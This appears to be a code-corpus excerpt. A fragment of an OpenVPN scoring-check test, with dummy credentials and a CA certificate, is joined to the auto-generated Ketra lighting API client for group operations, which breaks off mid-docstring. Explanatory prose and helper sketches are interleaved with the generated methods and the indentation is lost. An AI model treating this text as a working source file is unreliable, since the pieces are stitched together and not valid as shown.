XEf1lH34305N8VSJQVc2UhNlaTS6YWJOyYVHPUsAqq8fJF4aZRd87VnhtOev3rKaA=="
}
accounts = {
'test': 'test'
}
cmd = CHECKS_BIN_PATH + "/openvpn_check '127.0.0.1' 1234 'test' 'test' 'MIIDSzCCAjOgAwIBAgIUNf7YivHK0rWciIy1HsNNx/tGDt4wDQYJKoZIhvcNAQELBQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMTkwMjE1MDI0NzUyWhcNMjkwMjEyMDI0NzUyWjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKCNXjK+4bIikgmGoGZHWRmLoJRxPoBkuy2U1jkaADBrfg4b3CgLP/OV4PGv1SmCvvLMuvdwKjA9JnYgtbEWLYyOi/Kxssjm5nLpJbx6KBZOvRjVzoKO0ljNh5nAXDiOyR+2PBUgp7A3PImM4R05m5pi+jd8+WbrQ8nfNQ5o9bFX26WpvWHo7gTxT8u+e6nL25U6TUYrPuTbw2/PGylaOVlEZTFhDO1GgxUUuPAwAmloQSoAbSNTI6Ch2mE8c3/dyyf4E1m6x7ves2cV44KQv8wTkLi1vQlhILmsjyH5oxlZARFl/hWXo6EBodLKVtVu8lWfNO4Le3qBYOijGfZQEB0CAwEAAaOBkDCBjTAdBgNVHQ4EFgQUG7NBOgwKvoAHZpwodZ45wVhpuUIwUQYDVR0jBEowSIAUG7NBOgwKvoAHZpwodZ45wVhpuUKhGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghQ1/tiK8crStZyIjLUew03H+0YO3jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAQEAXvwmtRzcLhdtJoNlK8Cc+BxjK9mgURgh4qt8BMP28CMfKw36xXWgxsbi4g5v08ohn+GrBikPmicL5p/V5yo6cC63Q0uI04k2k+jlC8PRXheyhQjYwSF6Ua18gAyXInR1GZ7t5l2OOBP5MWLGJxpLE8Xp1yn7v0kyAMXA3hOICi1BdS844ZVWhwiasm+BE7lybdtf15sAdYGmAjrrKwtCOlJSJrzOZLThUUlgGlwK2PAdeyYTkoQGyY3cKTfmsujTzyLsHKvqk7RPbKelvSfx1XEf1lH34305N8VSJQVc2UhNlaTS6YWJOyYVHPUsAqq8fJF4aZRd87VnhtOev3rKaA=='"
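For reference, the expected `cmd` above follows a simple quoting pattern (host, credentials, and CA single-quoted; port bare). A hedged sketch of how such a command string could be assembled; the real argument construction lives in scoring_engine's check classes, and this formatter is illustrative only:

```python
# Illustrative only: assemble an openvpn_check command line in the same shape
# as the expected `cmd` string above (host/credentials/CA quoted, port bare).
def build_openvpn_cmd(bin_path, host, port, user, password, ca):
    return "{}/openvpn_check '{}' {} '{}' '{}' '{}'".format(
        bin_path, host, port, user, password, ca)
```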
# --- aioketraapi/api/group_operations_api.py (s4v4g3/aio-ketra-api, MIT License) ---
# coding: utf-8
"""
Ketra Lighting API
Control your Ketra lights # noqa: E501
The version of the OpenAPI document: 1.4.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from aioketraapi.api_client import ApiClient
from aioketraapi.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class GroupOperationsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def groups_get(self, **kwargs): # noqa: E501
"""Gets the list of groups # noqa: E501
Gets the list of lamp groups in the system # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_get(async_req=True)
>>> result = thread.get()
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param name: If specified, only the groups matching the string provided are returned
:type name: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: InlineResponse20012
"""
kwargs['_return_http_data_only'] = True
return self.groups_get_with_http_info(**kwargs) # noqa: E501
def groups_get_with_http_info(self, **kwargs): # noqa: E501
"""Gets the list of groups # noqa: E501
Gets the list of lamp groups in the system # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_get_with_http_info(async_req=True)
>>> result = thread.get()
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param name: If specified, only the groups matching the string provided are returned
:type name: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data only, without the status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(InlineResponse20012, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'basicauthuser',
'basicauthpassword',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'basicauthuser' in local_var_params and local_var_params['basicauthuser'] is not None: # noqa: E501
query_params.append(('basicauthuser', local_var_params['basicauthuser'])) # noqa: E501
if 'basicauthpassword' in local_var_params and local_var_params['basicauthpassword'] is not None: # noqa: E501
query_params.append(('basicauthpassword', local_var_params['basicauthpassword'])) # noqa: E501
if 'name' in local_var_params and local_var_params['name'] is not None: # noqa: E501
query_params.append(('Name', local_var_params['name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/Groups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse20012', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
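Each `*_with_http_info` method begins with the same allow-list check over `**kwargs`. The pattern in isolation, as a self-contained sketch rather than the generated code itself:

```python
# Self-contained sketch of the kwargs allow-list validation used by the
# generated *_with_http_info methods: unknown keywords raise immediately.
def validate_kwargs(method_name, all_params, kwargs):
    for key in kwargs:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method %s"
                % (key, method_name))
    return dict(kwargs)
```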
def groups_group_id_get(self, group_id, **kwargs): # noqa: E501
"""Gets a single group object # noqa: E501
Gets the group specified by {group-id}. If a group name is specified instead of a uuid, the first group matching the specified name will be returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_id_get(group_id, async_req=True)
>>> result = thread.get()
:param group_id: The group's name or unique identifier (uuid) (required)
:type group_id: str
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: InlineResponse20013
"""
kwargs['_return_http_data_only'] = True
return self.groups_group_id_get_with_http_info(group_id, **kwargs) # noqa: E501
def groups_group_id_get_with_http_info(self, group_id, **kwargs): # noqa: E501
"""Gets a single group object # noqa: E501
Gets the group specified by {group-id}. If a group name is specified instead of a uuid, the first group matching the specified name will be returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_id_get_with_http_info(group_id, async_req=True)
>>> result = thread.get()
:param group_id: The group's name or unique identifier (uuid) (required)
:type group_id: str
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data only, without the status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(InlineResponse20013, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'group_id',
'basicauthuser',
'basicauthpassword'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_group_id_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'group_id' is set
if self.api_client.client_side_validation and ('group_id' not in local_var_params or # noqa: E501
local_var_params['group_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `group_id` when calling `groups_group_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group_id' in local_var_params:
path_params['group-id'] = local_var_params['group_id'] # noqa: E501
query_params = []
if 'basicauthuser' in local_var_params and local_var_params['basicauthuser'] is not None: # noqa: E501
query_params.append(('basicauthuser', local_var_params['basicauthuser'])) # noqa: E501
if 'basicauthpassword' in local_var_params and local_var_params['basicauthpassword'] is not None: # noqa: E501
query_params.append(('basicauthpassword', local_var_params['basicauthpassword'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/Groups/{group-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse20013', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
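The repeated `query_params.append(...)` guards above implement one pattern: emit a (wire-name, value) pair only when the parameter was supplied. A compact, illustrative equivalent (note the `name` -> `Name` wire-name mapping used by `groups_get`):

```python
# Illustrative: build query parameters from supplied values only, mapping
# Python parameter names to wire names (e.g. 'name' -> 'Name' in groups_get).
def build_query_params(values, name_map):
    params = []
    for py_name, wire_name in name_map.items():
        if values.get(py_name) is not None:
            params.append((wire_name, values[py_name]))
    return params
```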
def groups_group_id_state_get(self, group_id, **kwargs): # noqa: E501
"""Gets the state of a single lamp group # noqa: E501
Gets the state of the group specified by {group-id}. If a group name is specified instead of a uuid, the state of the first group matching the specified name will be returned. Note that for API schema 3 (hub firmware 1.14) or earlier, this will only reflect the state of the last group operation -- light changes due to keypad operations are not reflected in the returned state. However in API schema 4 / hub firmware 1.15, if the hub is published with Design Studio 2.0 (and the 'SupportsZoneKeypads' property returned in GET /Hub is true), the lamp state returned will reflect the current state of the group. Please see the API overview document for more discussion on this topic. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_id_state_get(group_id, async_req=True)
>>> result = thread.get()
:param group_id: The group's name or unique identifier (uuid) (required)
:type group_id: str
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: InlineResponse20014
"""
kwargs['_return_http_data_only'] = True
return self.groups_group_id_state_get_with_http_info(group_id, **kwargs) # noqa: E501
def groups_group_id_state_get_with_http_info(self, group_id, **kwargs): # noqa: E501
"""Gets the state of a single lamp group # noqa: E501
Gets the state of the group specified by {group-id}. If a group name is specified instead of a uuid, the state of the first group matching the specified name will be returned. Note that for API schema 3 (hub firmware 1.14) or earlier, this will only reflect the state of the last group operation -- light changes due to keypad operations are not reflected in the returned state. However in API schema 4 / hub firmware 1.15, if the hub is published with Design Studio 2.0 (and the 'SupportsZoneKeypads' property returned in GET /Hub is true), the lamp state returned will reflect the current state of the group. Please see the API overview document for more discussion on this topic. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_id_state_get_with_http_info(group_id, async_req=True)
>>> result = thread.get()
:param group_id: The group's name or unique identifier (uuid) (required)
:type group_id: str
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data only, without the status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(InlineResponse20014, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'group_id',
'basicauthuser',
'basicauthpassword'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_group_id_state_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'group_id' is set
if self.api_client.client_side_validation and ('group_id' not in local_var_params or # noqa: E501
local_var_params['group_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `group_id` when calling `groups_group_id_state_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group_id' in local_var_params:
path_params['group-id'] = local_var_params['group_id'] # noqa: E501
query_params = []
if 'basicauthuser' in local_var_params and local_var_params['basicauthuser'] is not None: # noqa: E501
query_params.append(('basicauthuser', local_var_params['basicauthuser'])) # noqa: E501
if 'basicauthpassword' in local_var_params and local_var_params['basicauthpassword'] is not None: # noqa: E501
query_params.append(('basicauthpassword', local_var_params['basicauthpassword'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/Groups/{group-id}/State', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse20014', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def groups_group_id_state_put(self, group_id, lamp_state, **kwargs): # noqa: E501
"""Sets the state of a single lamp group # noqa: E501
Set the state of the group specified by {group-id}. If a group name is specified instead of a uuid, the state of the first group matching the specified name will be set # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_id_state_put(group_id, lamp_state, async_req=True)
>>> result = thread.get()
:param group_id: The group's name or unique identifier (uuid) (required)
:type group_id: str
:param lamp_state: Color settings to apply to the lamp group (required)
:type lamp_state: LampState
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: InlineResponse20014
"""
kwargs['_return_http_data_only'] = True
return self.groups_group_id_state_put_with_http_info(group_id, lamp_state, **kwargs) # noqa: E501
def groups_group_id_state_put_with_http_info(self, group_id, lamp_state, **kwargs): # noqa: E501
"""Sets the state of a single lamp group # noqa: E501
Set the state of the group specified by {group-id}. If a group name is specified instead of a uuid, the state of the first group matching the specified name will be set # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_id_state_put_with_http_info(group_id, lamp_state, async_req=True)
>>> result = thread.get()
:param group_id: The group's name or unique identifier (uuid) (required)
:type group_id: str
:param lamp_state: Color settings to apply to the lamp group (required)
:type lamp_state: LampState
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data only, without the status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(InlineResponse20014, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'group_id',
'lamp_state',
'basicauthuser',
'basicauthpassword'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_group_id_state_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'group_id' is set
if self.api_client.client_side_validation and ('group_id' not in local_var_params or # noqa: E501
local_var_params['group_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `group_id` when calling `groups_group_id_state_put`") # noqa: E501
# verify the required parameter 'lamp_state' is set
if self.api_client.client_side_validation and ('lamp_state' not in local_var_params or # noqa: E501
local_var_params['lamp_state'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `lamp_state` when calling `groups_group_id_state_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group_id' in local_var_params:
path_params['group-id'] = local_var_params['group_id'] # noqa: E501
query_params = []
if 'basicauthuser' in local_var_params and local_var_params['basicauthuser'] is not None: # noqa: E501
query_params.append(('basicauthuser', local_var_params['basicauthuser'])) # noqa: E501
if 'basicauthpassword' in local_var_params and local_var_params['basicauthpassword'] is not None: # noqa: E501
query_params.append(('basicauthpassword', local_var_params['basicauthpassword'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'lamp_state' in local_var_params:
body_params = local_var_params['lamp_state']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/Groups/{group-id}/State', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse20014', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def groups_state_post(self, lamp_state, **kwargs): # noqa: E501
"""Sets the state of a lamp group # noqa: E501
Sets the state of a lamp group specified by a name query parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_state_post(lamp_state, async_req=True)
>>> result = thread.get()
:param lamp_state: Color settings to apply to the lamp group (required)
:type lamp_state: LampState
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param name: name of the group to apply the state to
:type name: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: InlineResponse20014
"""
kwargs['_return_http_data_only'] = True
return self.groups_state_post_with_http_info(lamp_state, **kwargs) # noqa: E501
def groups_state_post_with_http_info(self, lamp_state, **kwargs): # noqa: E501
"""Sets the state of a lamp group # noqa: E501
Sets the state of a lamp group specified by a name query parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_state_post_with_http_info(lamp_state, async_req=True)
>>> result = thread.get()
:param lamp_state: Color settings to apply to the lamp group (required)
:type lamp_state: LampState
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param name: name of the group to apply the state to
:type name: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without the status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(InlineResponse20014, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'lamp_state',
'basicauthuser',
'basicauthpassword',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_state_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'lamp_state' is set
if self.api_client.client_side_validation and ('lamp_state' not in local_var_params or # noqa: E501
local_var_params['lamp_state'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `lamp_state` when calling `groups_state_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'basicauthuser' in local_var_params and local_var_params['basicauthuser'] is not None: # noqa: E501
query_params.append(('basicauthuser', local_var_params['basicauthuser'])) # noqa: E501
if 'basicauthpassword' in local_var_params and local_var_params['basicauthpassword'] is not None: # noqa: E501
query_params.append(('basicauthpassword', local_var_params['basicauthpassword'])) # noqa: E501
if 'name' in local_var_params and local_var_params['name'] is not None: # noqa: E501
query_params.append(('Name', local_var_params['name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'lamp_state' in local_var_params:
body_params = local_var_params['lamp_state']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/Groups/State', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse20014', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def root_get(self, **kwargs): # noqa: E501
"""Get keypads and groups (and scenes in API schema 4 or later) # noqa: E501
Gets all keypads and groups in the installation. Added in hub firmware version 1.14 (API schema 3). Scenes are also returned in API schema 4. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.root_get(async_req=True)
>>> result = thread.get()
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
